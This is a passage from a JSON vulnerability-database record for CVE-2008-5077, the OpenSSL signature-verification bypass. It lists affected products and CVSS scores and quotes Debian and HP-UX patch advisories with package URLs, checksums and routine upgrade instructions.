            "_id": null,
            "model": "pfsense",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bsdperimeter",
            "version": "1.2"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.1.2"
          },
          {
            "_id": null,
            "model": "communication manager server definity server r10",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "pfsense 1.2-rc2",
            "scope": null,
            "trust": 0.3,
            "vendor": "bsdperimeter",
            "version": null
          },
          {
            "_id": null,
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "_id": null,
            "model": "sparc enterprise m4000",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.10"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "_id": null,
            "model": "bind 9.5.0-p2-w2",
            "scope": null,
            "trust": 0.3,
            "vendor": "isc",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.7"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 13",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "_id": null,
            "model": "enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 91",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.9"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.5.1"
          },
          {
            "_id": null,
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "bigip global traffic manager",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "f5",
            "version": "10.0.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 47",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "novell linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9"
          },
          {
            "_id": null,
            "model": "bind -p2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.2.6"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 64",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "_id": null,
            "model": "project openssl beta1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 101",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "communication manager server definity server r9",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "linux armel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "aura sip enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3.1"
          },
          {
            "_id": null,
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "enterprise manager",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "f5",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.1.5"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4"
          },
          {
            "_id": null,
            "model": "linux lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop workstation client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "_id": null,
            "model": "bind",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "isc",
            "version": "9.1.3"
          },
          {
            "_id": null,
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1100"
          },
          {
            "_id": null,
            "model": "linux enterprise desktop sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "_id": null,
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "project openssl m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "intuity audix lx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "big-ip link controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4"
          },
          {
            "_id": null,
            "model": "communication manager server definity server r11",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.2"
          },
          {
            "_id": null,
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.2"
          },
          {
            "_id": null,
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "networks switched firewall series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "6400"
          },
          {
            "_id": null,
            "model": "multimedia",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2010-0376"
          },
          {
            "db": "BID",
            "id": "33150"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200901-055"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-5077"
          }
        ]
      },
      "credits": {
        "_id": null,
        "data": "Google Security Team",
        "sources": [
          {
            "db": "BID",
            "id": "33150"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200901-055"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2008-5077",
      "cvss": {
        "_id": null,
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2008-5077",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2008-5077",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200901-055",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200901-055"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-5077"
          }
        ]
      },
      "description": {
        "_id": null,
        "data": "OpenSSL 0.9.8i and earlier does not properly check the return value from the EVP_VerifyFinal function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature for DSA and ECDSA keys. F5\u0027s FirePass server is a powerful network device that can provide users with secure access to the company\u0027s network through any standard web browser. F5 FirePass products have unidentified security vulnerabilities, allowing malicious users to conduct fraud and forgery attacks. OpenSSL is prone to a signature-verification vulnerability. \nAn attacker would likely leverage this issue to conduct phishing attacks or impersonate legitimate sites.  Other attacks are also possible. \nReleases prior to OpenSSL 0.9.8j are affected. \n\nFor the stable distribution (etch), this problem has been fixed in\nversion 0.9.8c-4etch4 of the openssl package, and version\n0.9.7k-3.1etch2 of the openssl097 package. \n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.9.8g-15. \n\nThe testing distribution (lenny) will be fixed soon. \n\nWe recommend that you upgrade your OpenSSL packages. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch2.dsc\n    Size/MD5 checksum:     1069 fb69818a28ead5b3026dcafc1f5e92d5\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c.orig.tar.gz\n    Size/MD5 checksum:  3313857 78454bec556bcb4c45129428a766c886\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4.diff.gz\n    Size/MD5 checksum:    56230 ad913155fe55d659741976a1be02ee48\n  http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k.orig.tar.gz\n    Size/MD5 checksum:  3292692 be6bba1d67b26eabb48cf1774925416f\n  http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch2.diff.gz\n    Size/MD5 checksum:    34518 845a986c8a5170953c1e88c2d9965176\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4.dsc\n    Size/MD5 checksum:     1107 fd0b477d237c473e3f1491e8821b155d\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_alpha.deb\n    Size/MD5 checksum:  2561904 e0499757c84819b0cb4919de45e733c4\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_alpha.deb\n    Size/MD5 checksum:  3822008 a63ea4834f1be21cf7dacd7a60817914\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_alpha.deb\n    Size/MD5 checksum:  2209796 1d008a2d9fcb466c0e1393fd6cf1dced\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_alpha.deb\n    Size/MD5 checksum:  4558410 af0dcd956ae91457c01c5152bea8c775\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_alpha.deb\n    Size/MD5 checksum:  1026098 957ee2ef34a7aa24c41903eea6d1db51\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_alpha.deb\n    Size/MD5 checksum:  2621108 d42a2d70f27723a8dc9aab1dfb83ad10\n  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_alpha.udeb\n    Size/MD5 checksum:   677162 039dd8968e77f09312fc4e502601b6fe\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_amd64.deb\n    Size/MD5 checksum:   891116 0d771317a58430e6ecea1e38e6889ef4\n  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_amd64.udeb\n    Size/MD5 checksum:   580208 f08c5d2e4649dd9f077b440d3cd35963\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_amd64.deb\n    Size/MD5 checksum:  1655264 ec946f04aa2fae3a001be8c7ae330839\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_amd64.deb\n    Size/MD5 checksum:   753788 e5521b844646e69b1b8f2daa872b83b8\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_amd64.deb\n    Size/MD5 checksum:   992378 417077b8de5a56b9dad0667f2ab5b6e2\n  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_amd64.deb\n    Size/MD5 checksum:  2178820 effca1afcd65d7e418f3cb75dd875b1d\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_amd64.deb\n    Size/MD5 checksum:  1326428 670a34f7c39343a7939ba43c4658821c\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_hppa.deb\n    Size/MD5 checksum:  1586088 66b4b504f0e67fc74c9a98e1f6e8cbac\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_hppa.deb\n    Size/MD5 checksum:  1274896 2dc2191758d272e05461f574bd50031b\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_hppa.deb\n    Size/MD5 checksum:  1030994 cfe12740f5f0492a05646851dc042ba8\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_hppa.deb\n    Size/MD5 checksum:   945354 e001f9834b3a7fbfd69963118afc7922\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_hppa.deb\n    Size/MD5 checksum:   793836 489e8472b5b300e2627cd25be399f42f\n  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_hppa.udeb\n    Size/MD5 checksum:   631120 18fb83375c2b5a6689703c1219ad4f65\n  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_hppa.deb\n    Size/MD5 checksum:  2248436 0c045e8c6dcc0ee3e89d1808b3818eed\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_i386.deb\n    Size/MD5 checksum:  2285788 a1b0456725a0ca95457c74672a235097\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_i386.deb\n    Size/MD5 checksum:  1015498 04dd57145bc4d8fbd728bba329e7dc72\n  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_i386.udeb\n    Size/MD5 checksum:   554698 e30b6a20efd74af8bbd5bfb5e9241113\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_i386.deb\n    Size/MD5 checksum:  2721068 abec8c0872781f622454d14ae4e39bad\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_i386.deb\n    Size/MD5 checksum:  4646314 e0a3f1a4d622f7a6a8886bb1bdf56bbe\n  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_i386.deb\n    Size/MD5 checksum:  2094162 fe95acfa9d541760bbb0c0ed86982bcb\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_i386.deb\n    Size/MD5 checksum:  5582804 aa194f9d43a3890d810e81086b4ee473\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_ia64.deb\n    Size/MD5 checksum:  1263564 be2a79505ff0ae08e19c8ceeafdf7a08\n  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_ia64.deb\n    Size/MD5 checksum:  2593624 3a198fb3a4a51e81340d2a1175766c91\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_ia64.deb\n    Size/MD5 checksum:  1569658 4dbd1a9c3f4d0fe2b8906a8555e26105\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_ia64.deb\n    Size/MD5 checksum:  1071264 45a62ed67f0ad2168cab559b45aa7de6\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_ia64.deb\n    Size/MD5 checksum:  1192358 c28adf2245854e3b368d7f88590fc730\n  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_ia64.udeb\n    Size/MD5 checksum:   801742 ce515f87f93a6364b22f94c5840a4729\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_ia64.deb\n    Size/MD5 checksum:  1010004 4222d05c1eb0ce929c68f7c8cc11ecd3\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_mips.deb\n    Size/MD5 checksum:  1693440 29a8f61c5cfb619d20235fb91cf9ff3b\n  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_mips.udeb\n    Size/MD5 checksum:   580128 fc3af402963b6fa4d24b89a4afcd8bc3\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_mips.deb\n    Size/MD5 checksum:   876210 f87b4773e3c70539302f5af3b51800b9\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_mips.deb\n    Size/MD5 checksum:   993434 02a232c80759b81c67df2e6e6a2cca26\n  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_mips.deb\n    Size/MD5 checksum:  2258938 be0d32157248efd6f87f450630ce22ef\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_mipsel.deb\n    Size/MD5 checksum:   992856 85a14404d0cae1d5100721d014d5ee29\n  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_mipsel.deb\n    Size/MD5 checksum:  2255990 1bd0adee660543138600882fc2e42d81\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_mipsel.deb\n    Size/MD5 checksum:  1649560 22c06f600378978e094230c172db8ca4\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_mipsel.deb\n    Size/MD5 checksum:   860700 bc11dc6212a74c8ca4bf6d314f929dff\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_mipsel.deb\n    Size/MD5 checksum:   718942 4ad8442b8812dfe2fd4fcbe06591c3c2\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_mipsel.deb\n    Size/MD5 checksum:  1317060 1d35b7e67204b5b31ab16c2514c69e02\n  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_mipsel.udeb\n    Size/MD5 checksum:   566226 1300061de87860cdf5ecfaeb26839c5f\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_powerpc.deb\n    Size/MD5 checksum:   743386 7e189844da3112f289ff8f96458b7d6e\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_powerpc.deb\n    Size/MD5 checksum:  1002204 24f2f0ec4aa965ff9057f7055322b70e\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_powerpc.deb\n    Size/MD5 checksum:  1728492 6074f055c8257f19962341a29c0dc1c2\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_powerpc.deb\n    Size/MD5 checksum:  1382114 41b6f5900e7a6361625a7fde3329d389\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_powerpc.deb\n    Size/MD5 checksum:   895634 495901098cb75b870810b6abcb82c187\n  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_powerpc.deb\n    Size/MD5 checksum:  2210874 5b27bc4f2f2fc1c15957242a383b9921\n  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_powerpc.udeb\n    Size/MD5 checksum:   585332 5cb7f5d282dd56d2825253006fc4ac29\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_s390.deb\n    Size/MD5 checksum:  1317066 0e843e8f68a84557d8f9306c61609283\n  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_s390.deb\n    Size/MD5 checksum:  2193894 d3d5eeb042d82e5b383177e08136b3cc\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_s390.deb\n    Size/MD5 checksum:   951570 621f50aae93efdd5c31a94071e93eaa9\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_s390.deb\n    Size/MD5 checksum:  1633204 4e6a635c45caa90a0f28f58286b5b2bf\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_s390.deb\n    Size/MD5 checksum:  1014480 639c707aed6efc331f1c3b6b14322ee0\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_s390.deb\n    Size/MD5 checksum:   794236 3bc1224270f26fb7b85eae99b18a1e97\n  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_s390.udeb\n    Size/MD5 checksum:   643020 41a09437ea5130fe0daed09edd4e6423\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_sparc.udeb\n    Size/MD5 checksum:   539054 4807d481d7878ea7032d7aa9747e95e0\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_sparc.deb\n    Size/MD5 checksum:  2124310 91c54b669eae9e38ae65486d5f082c6b\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_sparc.deb\n    Size/MD5 checksum:  3418866 a6805a9c7125b04e0c226b2a90c9d5d2\n  http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_sparc.deb\n    Size/MD5 checksum:  1801340 af40fbabcf27d1c8a81d18f3e3d4ac4d\n  http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_sparc.deb\n    Size/MD5 checksum:  2113338 c5e7dd09e9c4133e9a06a286ace5b7ed\n  http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_sparc.deb\n    Size/MD5 checksum:  1020946 713c98cac975ec8c0c64c96812353f82\n  http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_sparc.deb\n    Size/MD5 checksum:  4089498 b1c0f345c3d51a9dea6dd07a003e6e4e\n\n\n  These files will probably be moved into the stable distribution on\n  its next update. \nHP System Management Homepage (SMH) before v3.0.1.73 running on Linux and Windows 2003, 2008. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c01706219\nVersion: 1\n\nHPSBUX02418 SSRT090002 rev.1 - HP-UX Running OpenSSL, Remote Unauthorized Access\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2009-03-31\nLast Updated: 2009-03-30\n\nPotential Security Impact: Remote unauthorized access\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP-UX running OpenSSL. The vulnerability could be exploited remotely to allow an unauthorized access. \n\nReferences: CVE-2008-5077\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, B.11.31 running OpenSSL\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics \n===============================================\nReference                         Base Vector               Base Score \nCVE-2008-5077     (AV:R/AC:L/Au:N/C:N/I:P/A:N)      5.0\n===============================================\nInformation on CVSS is documented in HP Customer Notice: HPSN-2008-002. \n \nRESOLUTION\n\nHP has provided the following patches to resolve this vulnerability. \nThe patches are available from the following location: \n\nURL: http://software.hp.com \n\nHP-UX Release \n HP-UX OpenSSL version \n \nB.11.11 (11i v1)\n A.00.09.07m.046\n \nB.11.23 (11i v2)\n A.00.09.07m.047\n \nB.11.31 (11i v3)\n A.00.09.08j.003\n \nMANUAL ACTIONS: Yes - Update \n\nPRODUCT SPECIFIC INFORMATION \n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa \n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS \n\nHP-UX B.11.11 \n================== \nfips_1_1_2.FIPS-CONF \nfips_1_1_2.FIPS-DOC \nfips_1_1_2.FIPS-INC \nfips_1_1_2.FIPS-LIB \nfips_1_1_2.FIPS-MAN \nfips_1_1_2.FIPS-MIS \nfips_1_1_2.FIPS-RUN \nfips_1_1_2.FIPS-SRC \naction: install revision FIPS-OPENSSL-1.1.2.046 or subsequent \nfips_1_2.FIPS-CONF \nfips_1_2.FIPS-DOC \nfips_1_2.FIPS-INC \nfips_1_2.FIPS-LIB \nfips_1_2.FIPS-MAN \nfips_1_2.FIPS-MIS \nfips_1_2.FIPS-RUN \nfips_1_2.FIPS-SRC \naction: install revision FIPS-OPENSSL-1.2.001 or subsequent \nopenssl.OPENSSL-CER \nopenssl.OPENSSL-CONF \nopenssl.OPENSSL-DOC \nopenssl.OPENSSL-INC \nopenssl.OPENSSL-LIB \nopenssl.OPENSSL-MAN \nopenssl.OPENSSL-MIS \nopenssl.OPENSSL-PRNG \nopenssl.OPENSSL-PVT \nopenssl.OPENSSL-RUN \nopenssl.OPENSSL-SRC \naction: install revision A.00.09.07m.046 or subsequent \nURL: http://software.hp.com \n\nHP-UX B.11.23 \n================== \nfips_1_1_2.FIPS-CONF \nfips_1_1_2.FIPS-DOC \nfips_1_1_2.FIPS-INC \nfips_1_1_2.FIPS-LIB \nfips_1_1_2.FIPS-MAN \nfips_1_1_2.FIPS-MIS \nfips_1_1_2.FIPS-RUN \nfips_1_1_2.FIPS-SRC \naction: install revision FIPS-OPENSSL-1.1.2.047 or subsequent \nfips_1_2.FIPS-CONF \nfips_1_2.FIPS-DOC \nfips_1_2.FIPS-INC 